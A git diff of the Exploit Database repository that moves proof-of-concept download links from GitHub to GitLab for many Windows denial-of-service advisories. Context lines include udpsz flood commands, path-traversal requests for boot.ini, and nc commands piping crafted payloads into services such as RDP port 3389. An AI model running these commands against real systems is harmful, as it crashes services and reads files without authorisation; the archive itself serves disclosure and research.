a/exploits/windows/dos/17885.txt +++ b/exploits/windows/dos/17885.txt @@ -238,7 +238,7 @@ effect. http://aluigi.org/testz/udpsz.zip (version 0.3.3) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17885-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17885-1.zip A] udpsz -T -C "08000000 00000000 ffffffff" -b a SERVER 8800 0x400 @@ -255,7 +255,7 @@ C] D] http://aluigi.org/poc/yrwxls_1.zip - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17885-2.zip + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17885-2.zip E] udpsz -C "eb50eb50 5300 ffff0000 0100 ffff ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff diff --git a/exploits/windows/dos/17889.txt b/exploits/windows/dos/17889.txt index d786cfe3c..4aadad4b8 100644 --- a/exploits/windows/dos/17889.txt +++ b/exploits/windows/dos/17889.txt @@ -89,7 +89,7 @@ integer overflow vulnerability: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17889.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17889.zip udpsz -b a -T -c "1=4294967279~2=0~" SERVER PORT 0xffff diff --git a/exploits/windows/dos/17896.txt b/exploits/windows/dos/17896.txt index 44737d895..c8fedd0f0 100644 --- a/exploits/windows/dos/17896.txt +++ b/exploits/windows/dos/17896.txt @@ -105,7 +105,7 @@ aipgctl.ocx (083B40D3-CCBA-11D2-AFE0-00C04F7993D6): http://aluigi.org/poc/pcvue_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17896.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17896.zip ####################################################################### diff --git a/exploits/windows/dos/17903.txt b/exploits/windows/dos/17903.txt index 1c5f04cbd..0f6c1625f 100644 --- a/exploits/windows/dos/17903.txt +++ b/exploits/windows/dos/17903.txt @@ -64,7 +64,7 @@ and all the operations like the above one. http://aluigi.org/poc/ncss_1.s0 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17903.s0 +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17903.s0 the 16bit value for EDX is located at offset 0x8bd. diff --git a/exploits/windows/dos/17918.txt b/exploits/windows/dos/17918.txt index 3320413da..65784d315 100644 --- a/exploits/windows/dos/17918.txt +++ b/exploits/windows/dos/17918.txt @@ -114,4 +114,4 @@ REF #2: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4940.php Proof Of Concept: ----------------- http://www.zeroscience.mk/codes/brush_gradiently.rar (11071 bytes) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17918.rar (brush_gradiently.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17918.rar (brush_gradiently.rar) \ No newline at end of file diff --git a/exploits/windows/dos/1792.txt b/exploits/windows/dos/1792.txt index 7ef41a859..b0de0c742 100644 --- a/exploits/windows/dos/1792.txt +++ b/exploits/windows/dos/1792.txt @@ -1,3 +1,3 @@ # GNUnet <= 0.7.0d (Empty UDP Packet) Remote Denial of Service Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1792.zip (05152006-udpsz.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1792.zip (05152006-udpsz.zip) \ No newline at end of file diff --git a/exploits/windows/dos/17929.txt b/exploits/windows/dos/17929.txt index d626d03d1..fec402fda 100644 --- a/exploits/windows/dos/17929.txt +++ b/exploits/windows/dos/17929.txt @@ -95,7 +95,7 @@ Poc in HTML File: http://pastebin.com/DBUGWbQM The PDF file needed can be found here: http://www.irs.gov/pub/irs-pdf/fw4.pdf Download both files here: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17929.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17929.zip ----------------Steps to Reproduce---------------- diff --git a/exploits/windows/dos/17930.txt b/exploits/windows/dos/17930.txt index 157f5b5c4..444213220 100644 --- a/exploits/windows/dos/17930.txt +++ b/exploits/windows/dos/17930.txt @@ -91,7 +91,7 @@ Stack overflow in the handling of the USE command of the CYB files. http://aluigi.org/poc/cytel_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17930.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17930.zip ####################################################################### diff --git a/exploits/windows/dos/17931.txt b/exploits/windows/dos/17931.txt index cbdb9186e..04c29e199 100644 --- a/exploits/windows/dos/17931.txt +++ b/exploits/windows/dos/17931.txt @@ -119,7 +119,7 @@ consequent freeing of arbitrary memory (write4): http://aluigi.org/poc/genstat_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17931.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17931.zip A] modified 32bit field at offset 0x46 B] modified 32bit field at offset 0x302 and added 'a's diff --git a/exploits/windows/dos/17963.txt b/exploits/windows/dos/17963.txt index cb6c0cf4b..7fabecd64 100644 --- a/exploits/windows/dos/17963.txt +++ b/exploits/windows/dos/17963.txt @@ -108,10 +108,10 @@ particular negative Content-Length. http://aluigi.org/mytoolz/mydown.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17963-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17963-1.zip http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17963-2.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17963-2.zip A] mydown http://SERVER/..\..\..\..\..\..\..\boot.ini diff --git a/exploits/windows/dos/17964.txt b/exploits/windows/dos/17964.txt index ccd504069..4b3e8ef8b 100644 --- a/exploits/windows/dos/17964.txt +++ b/exploits/windows/dos/17964.txt @@ -74,7 +74,7 @@ execution: http://aluigi.org/poc/automgen_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17964.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17964.zip ####################################################################### diff --git a/exploits/windows/dos/17965.txt b/exploits/windows/dos/17965.txt index 46689560b..09f7cfd1b 100644 --- a/exploits/windows/dos/17965.txt +++ b/exploits/windows/dos/17965.txt @@ -58,7 +58,7 @@ No additional research performed. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17965.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17965.zip udpsz -l 2000 -c ".NET\1\0\0\0\0\0\xff\xff\xff\xff\4\0\1\1\x25\0\0\0tcp://127.0.0.1/OPC Systems Interface\6\0\1\1" -T SERVER 58723 0x80 diff --git a/exploits/windows/dos/17978.txt b/exploits/windows/dos/17978.txt index 2da6e98d8..e0211c615 100644 --- a/exploits/windows/dos/17978.txt +++ b/exploits/windows/dos/17978.txt @@ -9,7 +9,7 @@ Exploit is downloadable from: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17978.tar.gz (my.fon.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17978.tar.gz (my.fon.tar.gz) http://exploitshop.wordpress.com/2011/10/12/ms11-077-vulnerabilities-in-windows-kernel-mode-drivers-could-allow-remote-code-execution-2567053/ diff --git a/exploits/windows/dos/18049.txt b/exploits/windows/dos/18049.txt index 319be05ef..d22aea6da 100644 --- a/exploits/windows/dos/18049.txt +++ b/exploits/windows/dos/18049.txt @@ -60,7 +60,7 @@ for being executed. http://aluigi.org/poc/promotic_2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18049.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18049.zip ####################################################################### diff --git a/exploits/windows/dos/18078.txt b/exploits/windows/dos/18078.txt index 163539d72..5699d6b59 100644 --- a/exploits/windows/dos/18078.txt +++ b/exploits/windows/dos/18078.txt @@ -94,7 +94,7 @@ excel_1b.xls: http://aluigi.org/poc/excel_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18078.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18078.zip ####################################################################### diff --git a/exploits/windows/dos/18112.txt b/exploits/windows/dos/18112.txt index 1fdd5c1ec..3497f2ca6 100644 --- a/exploits/windows/dos/18112.txt +++ b/exploits/windows/dos/18112.txt @@ -80,7 +80,7 @@ Endless loop with CPU at 100% caused by incomplete packets: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18112.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip A] udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107 diff --git a/exploits/windows/dos/18165.txt b/exploits/windows/dos/18165.txt index 4e2b5a13c..4535ca31d 100644 --- a/exploits/windows/dos/18165.txt +++ b/exploits/windows/dos/18165.txt @@ -115,7 +115,7 @@ has more experience than me with this component can confirm it or not. http://aluigi.org/poc/almsrvx_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18165.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18165.zip A] almsrvx_1 almsrvx_1a.dat SERVER diff --git a/exploits/windows/dos/18166.txt b/exploits/windows/dos/18166.txt index fbe1cd9db..eaf978b81 100644 --- a/exploits/windows/dos/18166.txt +++ b/exploits/windows/dos/18166.txt @@ -194,7 +194,7 @@ number or on the sum of both: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18166-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18166-1.zip A] udpsz -C "0004 02 00 00 00 ffffffff" -b a -T SERVER 2308 2+0x400 @@ -214,7 +214,7 @@ C] D] http://aluigi.org/mytoolz/mydown.zip - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18166-2.zip + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18166-2.zip mydown http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini E] diff --git a/exploits/windows/dos/18196.py b/exploits/windows/dos/18196.py index 3396724bc..4b5dd4902 100755 --- a/exploits/windows/dos/18196.py +++ b/exploits/windows/dos/18196.py @@ -60,8 +60,4 @@ try: connectionx.close() except socket.error: print "it couldn't connect" - time.sleep(2) - - - - + time.sleep(2) \ No newline at end of file diff --git a/exploits/windows/dos/18256.txt b/exploits/windows/dos/18256.txt index 7d21c5ff7..4309a9f91 100644 --- a/exploits/windows/dos/18256.txt +++ b/exploits/windows/dos/18256.txt @@ -63,5 +63,5 @@ NULL after freeing them, which can be exploited to cause a double-free condition ============= 4) The Code ============= -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18256.fpx +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18256.fpx http://www.protekresearchlab.com/exploits/PRL-2011-11.fpx \ No newline at end of file diff --git a/exploits/windows/dos/18257.txt b/exploits/windows/dos/18257.txt index 3e883b1a1..abab8eedb 100644 --- a/exploits/windows/dos/18257.txt +++ b/exploits/windows/dos/18257.txt @@ -66,5 +66,5 @@ image file. 4) The Code ============= -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18257.tif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18257.tif http://www.protekresearchlab.com/exploits/PRL-2011-10.tif \ No newline at end of file diff --git a/exploits/windows/dos/18461.html b/exploits/windows/dos/18461.html index 73f3ad64d..5a868883d 100644 --- a/exploits/windows/dos/18461.html +++ b/exploits/windows/dos/18461.html @@ -19,5 +19,4 @@ arg1=String(3092, "A") target.LicenseName = arg1 -</script> - +</script> \ No newline at end of file diff --git a/exploits/windows/dos/18481.py b/exploits/windows/dos/18481.py index 77b40cb59..8929c7d07 100755 --- a/exploits/windows/dos/18481.py +++ b/exploits/windows/dos/18481.py @@ -14,5 +14,4 @@ payload = (header+junk) f = open("Exploit.m3u","wb") f.write(payload) -f.close() - +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/18488.txt b/exploits/windows/dos/18488.txt index aeb62f83d..13785a4d5 100644 --- a/exploits/windows/dos/18488.txt +++ b/exploits/windows/dos/18488.txt @@ -76,7 +76,7 @@ to change the NM_A_PARM1 field if you want to use another one. http://aluigi.org/poc/nmma_x.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18488.zip (nmma_x.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18488.zip (nmma_x.zip) nmma_x 3 SERVER diff --git a/exploits/windows/dos/18489.txt b/exploits/windows/dos/18489.txt index 66b40e964..981f9a5e1 100644 --- a/exploits/windows/dos/18489.txt +++ b/exploits/windows/dos/18489.txt @@ -72,7 +72,7 @@ service is multi-thread) may be possible to control the corruption. http://aluigi.org/poc/nmma_x.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18489.zip (nmma_x.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18489.zip (nmma_x.zip) nmma_x 1 SERVER diff --git a/exploits/windows/dos/18490.txt b/exploits/windows/dos/18490.txt index d21fd093b..fc74e2763 100644 --- a/exploits/windows/dos/18490.txt +++ b/exploits/windows/dos/18490.txt @@ -67,7 +67,7 @@ after having replaced the "SERVER" string with the name of the server where is located the nim_1.nmx file: http://aluigi.org/poc/nim_1.zip - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18490.zip + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18490.zip ####################################################################### diff --git a/exploits/windows/dos/18491.txt b/exploits/windows/dos/18491.txt index f199a6ca2..825a01d42 100644 --- a/exploits/windows/dos/18491.txt +++ b/exploits/windows/dos/18491.txt @@ -195,7 +195,7 @@ Heap overflow in the handling of the frames in the FLI files. http://aluigi.org/poc/xnview_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18491.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18491.zip ####################################################################### diff --git a/exploits/windows/dos/18512.txt b/exploits/windows/dos/18512.txt index 90df0f75e..102344572 100644 --- a/exploits/windows/dos/18512.txt +++ b/exploits/windows/dos/18512.txt @@ -57,7 +57,7 @@ and, (tested on Firefox) EIP pointing to an invalid memory zone. http://aluigi.org/poc/unity3d_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18512.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18512.zip ####################################################################### diff --git a/exploits/windows/dos/18586.txt b/exploits/windows/dos/18586.txt index e65f86f34..81d0af884 100644 --- a/exploits/windows/dos/18586.txt +++ b/exploits/windows/dos/18586.txt @@ -58,4 +58,4 @@ an heap-based buffer overflow by tricking a user into opening a specially crafte =========== Here: http://www.protekresearchlab.com/exploits/PRL-2012-06.fpx -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18586.pfx (PRL-2012-06.fpx) \ No newline at end of file +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18586.pfx (PRL-2012-06.fpx) \ No newline at end of file diff --git a/exploits/windows/dos/18602.txt b/exploits/windows/dos/18602.txt index d1655ab7e..92332cf0c 100644 --- a/exploits/windows/dos/18602.txt +++ b/exploits/windows/dos/18602.txt @@ -74,7 +74,7 @@ it's longer than that size and starts with "1.": http://aluigi.org/poc/eeventmanager_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18602.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18602.dat nc SERVER 2968 < eeventmanager_1.dat diff --git a/exploits/windows/dos/18606.txt b/exploits/windows/dos/18606.txt index 0cb72e9db..52f9e797e 100644 --- a/exploits/windows/dos/18606.txt +++ b/exploits/windows/dos/18606.txt @@ -172,7 +172,7 @@ http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx http://aluigi.org/poc/termdd_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18606.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18606.dat nc SERVER 3389 < termdd_1.dat diff --git a/exploits/windows/dos/18633.txt b/exploits/windows/dos/18633.txt index 34493b1af..8e2e45919 100644 --- a/exploits/windows/dos/18633.txt +++ b/exploits/windows/dos/18633.txt @@ -91,4 +91,4 @@ a use-after-free by e.g. tricking a user into opening a specially crafted file. =========== http://www.protekresearchlab.com/exploits/PRL-2012-07.tif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18633.tif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18633.tif \ No newline at end of file diff --git a/exploits/windows/dos/18661.txt b/exploits/windows/dos/18661.txt index 9e4e3e3d5..526829c7b 100644 --- a/exploits/windows/dos/18661.txt +++ b/exploits/windows/dos/18661.txt @@ -194,4 +194,4 @@ PoC = ("\x00\x00\x00\x1C\x66\x74\x79\x70\x6D\x70\x34\x32\x00\x00\x00\x00\x69\x73 payload = (PoC) f = open("PoC.mp4","wb") f.write(payload) -f.close() +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/18739.txt b/exploits/windows/dos/18739.txt index 1966ac50a..ece7158b9 100644 --- a/exploits/windows/dos/18739.txt +++ b/exploits/windows/dos/18739.txt @@ -62,7 +62,7 @@ and can be exploited to cause a heap-based buffer overflow via a specially craft 4) The PoC ============= -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18739.fpx +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18739.fpx ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/18765.txt b/exploits/windows/dos/18765.txt index 3b67c4c22..46fb5365d 100644 --- a/exploits/windows/dos/18765.txt +++ b/exploits/windows/dos/18765.txt @@ -87,7 +87,7 @@ Stack overflow in the BackupToAvi method used by the ActiveX components A] http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18765-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18765-1.zip NiwMasterService: udpsz -b 0x80 -T SERVER 4505 0x28 diff --git a/exploits/windows/dos/18771.txt b/exploits/windows/dos/18771.txt index 1cb30e15e..b0e7a5338 100644 --- a/exploits/windows/dos/18771.txt +++ b/exploits/windows/dos/18771.txt @@ -24,7 +24,7 @@ Hash: SHA1 Proof of concept: http://shinnai.altervista.org/exploits/sumatra.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18771.rar +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18771.rar ============================================================================= ============================================================================= diff --git a/exploits/windows/dos/18774.txt b/exploits/windows/dos/18774.txt index bafecab0f..0766a1a5d 100644 --- a/exploits/windows/dos/18774.txt +++ b/exploits/windows/dos/18774.txt @@ -70,7 +70,7 @@ Hash: SHA1 at 0x0012F6E8 PoC: http://shinnai.altervista.org/exploits/mobi.rar - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18774.rar + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18774.rar ============================================================================= ============================================================================= diff --git a/exploits/windows/dos/18776.txt b/exploits/windows/dos/18776.txt index af5c7cec6..3b1600ee7 100644 --- a/exploits/windows/dos/18776.txt +++ b/exploits/windows/dos/18776.txt @@ -35,7 +35,7 @@ Hash: SHA1 Crafting a .chm file is possible to cause a stack based buffer overflow. PoC: http://shinnai.altervista.org/exploits/chm.rar - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18776.rar + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18776.rar ============================================================================= ============================================================================= diff --git a/exploits/windows/dos/18795.py b/exploits/windows/dos/18795.py index 63a9fe822..1bb4f8823 100755 --- a/exploits/windows/dos/18795.py +++ b/exploits/windows/dos/18795.py @@ -33,5 +33,4 @@ Data = ("\x00\x00\x00\x1c\x66\x74\x79\x70\x6d\x70\x34\x32\x00\x00\x00\x00\x69\x7 avi = open('poc.mp4', 'wb+') avi.write(Data) -avi.close() - +avi.close() \ No newline at end of file diff --git a/exploits/windows/dos/18864.txt b/exploits/windows/dos/18864.txt index 334bc2559..67c064354 100644 --- a/exploits/windows/dos/18864.txt +++ b/exploits/windows/dos/18864.txt @@ -82,7 +82,7 @@ advisory must be considered only a case study and nothing more. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18864.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18864.zip A] diff --git a/exploits/windows/dos/18878.txt b/exploits/windows/dos/18878.txt index bed12e70b..bb13e5264 100644 --- a/exploits/windows/dos/18878.txt +++ b/exploits/windows/dos/18878.txt @@ -178,7 +178,7 @@ with the protocol running on the UDP one (type, flags, size, data). http://aluigi.org/poc/proservrex_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18878.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18878.zip ####################################################################### diff --git a/exploits/windows/dos/18894.txt b/exploits/windows/dos/18894.txt index 30489a7e6..5a43de02f 100644 --- a/exploits/windows/dos/18894.txt +++ b/exploits/windows/dos/18894.txt @@ -123,4 +123,4 @@ Description POC === -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18894.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18894.zip \ No newline at end of file diff --git a/exploits/windows/dos/18952.txt b/exploits/windows/dos/18952.txt index b3c6de080..afddae979 100644 --- a/exploits/windows/dos/18952.txt +++ b/exploits/windows/dos/18952.txt @@ -48,4 +48,4 @@ $ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3 $ Below You should see link to attachement with PoC: http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18952.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18952.rar \ No newline at end of file diff --git a/exploits/windows/dos/18964.txt b/exploits/windows/dos/18964.txt index 1c50c99d0..fe87f8781 100644 --- a/exploits/windows/dos/18964.txt +++ b/exploits/windows/dos/18964.txt @@ -65,4 +65,4 @@ and can be exploited to cause a heap-based buffer overflow via a specially craft ============= http://protekresearchlab.com/exploits/PRL-2012-10.ecw -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18964.ecw \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18964.ecw \ No newline at end of file diff --git a/exploits/windows/dos/18972.txt b/exploits/windows/dos/18972.txt index e6a7119d8..6ec351811 100644 --- a/exploits/windows/dos/18972.txt +++ b/exploits/windows/dos/18972.txt @@ -54,4 +54,4 @@ and can be exploited to cause a stack-based buffer overflow via a specially craf ============= http://protekresearchlab.com/exploits/PRL-2012-11.ttf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18972.ttf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18972.ttf \ No newline at end of file diff --git a/exploits/windows/dos/19089.txt b/exploits/windows/dos/19089.txt index e1034f3df..7d3920f93 100644 --- a/exploits/windows/dos/19089.txt +++ b/exploits/windows/dos/19089.txt @@ -44,4 +44,4 @@ More detailed vulnerability analysis can be found at http://blog.cr4.sh/2012/06/ POC ==== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19089.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19089.rar \ No newline at end of file diff --git a/exploits/windows/dos/19181.txt b/exploits/windows/dos/19181.txt index 8d9aaf542..8aaf3e786 100644 --- a/exploits/windows/dos/19181.txt +++ b/exploits/windows/dos/19181.txt @@ -59,4 +59,4 @@ to cause a heap-based buffer overflow via a specially crafted "Depth" value in a =========== http://www.protekresearchlab.com/exploits/PRL-2012-14.ras -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19181.ras \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19181.ras \ No newline at end of file diff --git a/exploits/windows/dos/19182.txt b/exploits/windows/dos/19182.txt index 1973c272a..d2013fff9 100644 --- a/exploits/windows/dos/19182.txt +++ b/exploits/windows/dos/19182.txt @@ -60,4 +60,4 @@ overflow via a specially crafted ECW file. =========== http://www.protekresearchlab.com/exploits/PRL-2012-13.ecw -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19182.ecw \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19182.ecw \ No newline at end of file diff --git a/exploits/windows/dos/19183.txt b/exploits/windows/dos/19183.txt index 2882ad7f6..7cc3f0b90 100644 --- a/exploits/windows/dos/19183.txt +++ b/exploits/windows/dos/19183.txt @@ -59,4 +59,4 @@ exploited to cause a heap-based buffer overflow via a specially crafted FPX file =========== http://www.protekresearchlab.com/exploits/PRL-2012-12.fpx -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19183.fpx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19183.fpx \ No newline at end of file diff --git a/exploits/windows/dos/19289.txt b/exploits/windows/dos/19289.txt index ca39eac6f..5d3764348 100644 --- a/exploits/windows/dos/19289.txt +++ b/exploits/windows/dos/19289.txt @@ -63,7 +63,7 @@ The vulnerability is located in the lupin3 (libpin3) library. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19289.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19289.zip udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 2147483647\r\n\r\n" -T SERVER 9500 -1 or diff --git a/exploits/windows/dos/19331.txt b/exploits/windows/dos/19331.txt index 95b4eb465..3cb1d52c3 100644 --- a/exploits/windows/dos/19331.txt +++ b/exploits/windows/dos/19331.txt @@ -62,4 +62,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may 4) The Code =========== http://protekresearchlab.com/exploits/PRL-2012-22.rle -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19331.rle \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19331.rle \ No newline at end of file diff --git a/exploits/windows/dos/19332.txt b/exploits/windows/dos/19332.txt index dffe1f3f5..967477cb0 100644 --- a/exploits/windows/dos/19332.txt +++ b/exploits/windows/dos/19332.txt @@ -62,4 +62,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may =========== http://protekresearchlab.com/exploits/PRL-2012-21.pct -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19332.pct \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19332.pct \ No newline at end of file diff --git a/exploits/windows/dos/19333.txt b/exploits/windows/dos/19333.txt index ee4e8cba9..b10b77bcc 100644 --- a/exploits/windows/dos/19333.txt +++ b/exploits/windows/dos/19333.txt @@ -63,4 +63,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may =========== http://protekresearchlab.com/exploits/PRL-2012-20.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19333.gif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19333.gif \ No newline at end of file diff --git a/exploits/windows/dos/19334.txt b/exploits/windows/dos/19334.txt index 71cb19f50..808eaa0ec 100644 --- a/exploits/windows/dos/19334.txt +++ b/exploits/windows/dos/19334.txt @@ -63,4 +63,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may =========== http://protekresearchlab.com/exploits/PRL-2012-19.cur -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19334.cur \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19334.cur \ No newline at end of file diff --git a/exploits/windows/dos/19335.txt b/exploits/windows/dos/19335.txt index 59bde8457..7e7fc0dee 100644 --- a/exploits/windows/dos/19335.txt +++ b/exploits/windows/dos/19335.txt @@ -61,4 +61,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-18.gif 